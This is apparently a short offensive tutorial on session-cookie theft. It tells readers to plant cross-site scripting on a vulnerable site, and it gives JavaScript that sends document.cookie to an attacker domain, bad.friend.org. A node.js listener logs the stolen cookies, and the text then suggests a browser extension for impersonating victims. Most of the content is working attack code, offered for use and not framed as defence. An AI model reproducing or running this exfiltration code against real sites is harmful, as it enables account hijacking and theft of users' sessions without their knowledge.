Previously, we have demonstrated how to use ARP poison attacks to compromise unencrypted communication on local area networks (LAN). The attacks described below are effective over HTTPS traffic from external networks.

Cookie Stealing

First, you must create an entry point on the vulnerable website with cross-site scripting. Force clients to establish a connection with your server.

JavaScript Injection

For the code snippet below, we assume your server is accessible at the domain bad.friend.org. This is an example of an AJAX request, which is unlikely to be noticed by victims.

1
2
3
4
5
6
let yourCookie = encodeURI(document.cookie);
url = `http://bad.friend.org/gimmie?yourCookies=${yourCookie}`;

let xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.send();

Basic node.js Server

This is a minimal node.js server that prints HTTP request parameters to standard output.

1
2
3
4
5
6
7
8
9
10
const http = require('http');

http.createServer((req, res) => {

  let i = req.url.indexOf('?');
  if (i !== -1)
    console.log(req.connection.remoteAddress + ' ' + req.url.substring(i));

  res.end('thanks buddy\n');
}).listen(process.env.PORT || 8125);

You can impersonate victims by spoofing their unique cookie. The Chrome extension EditThisCookie is easy to use.

Alternative Approaches

Your situation might constrain the available options. More examples are available on Github.